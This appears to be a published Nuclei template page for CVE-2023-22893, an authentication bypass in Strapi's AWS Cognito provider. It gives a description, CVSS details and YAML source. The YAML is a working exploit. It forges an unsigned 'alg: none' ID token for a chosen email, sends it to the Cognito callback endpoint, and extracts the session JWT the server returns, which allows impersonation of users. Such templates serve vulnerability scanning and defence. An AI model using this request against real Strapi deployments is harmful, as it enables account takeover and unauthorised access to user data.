Strapi Versions <=4.5.6 - Authentication Bypass

ID: CVE-2023-22893

Severity: high

Author: iamnoooob,rootxharsh,pdresearch

Tags: cve,cve2023,strapi,authenticated,aws,cognito

Description

Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the ‘None’ type algorithm to bypass authentication and impersonate any user that use AWS Cognito for authentication.

YAML Source

id: CVE-2023-22893

info:
  name: Strapi Versions <=4.5.6 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    Strapi through 4.5.5 does not verify the access or ID tokens issued during the OAuth flow when the AWS Cognito login provider is used for authentication. A remote attacker could forge an ID token that is signed using the 'None' type algorithm to bypass authentication and impersonate any user that use AWS Cognito for authentication.
  reference:
    - https://www.ghostccamm.com/blog/multi_strapi_vulns
    - https://github.com/strapi/strapi/releases
    - https://github.com/ARPSyndicate/cvemon
    - https://nvd.nist.gov/vuln/detail/CVE-2023-22893
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2023-22893
    cwe-id: CWE-287
    epss-score: 0.00337
    epss-percentile: 0.71798
    cpe: cpe:2.3:a:strapi:strapi:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: strapi
    product: strapi
    fofa-query: app="strapi-Headless-CMS"
  tags: cve,cve2023,strapi,authenticated,aws,cognito

variables:
  email: "{{email}}"
  payload: '{"cognito:username":"{{to_lower(rand_text_alpha(10))}}","email":"{{email}}"}'

http:
  - raw:
      - |
        GET /api/auth/cognito/callback?access_token={{to_lower(rand_text_alpha(8))}}&id_token=eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.{{base64(payload)}}. HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"provider":'
          - '"confirmed":'
        condition: and

      - type: word
        part: content_type
        words:
          - application/json

      - type: status
        status:
          - 200

    extractors:
      - type: json
        part: body
        name: token
        json:
          - ".jwt"
# digest: 4a0a0047304502201e60487ff4c4d30e77cd927999f0ebb9eb7a5e0065bd6be1e7c6778d8777f580022100ab763ac01d0e29b4b0f3cac1bd73e0b0ecf1988e5c13a5f1d002fce2c553cc59:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-22893.yaml"

View on Github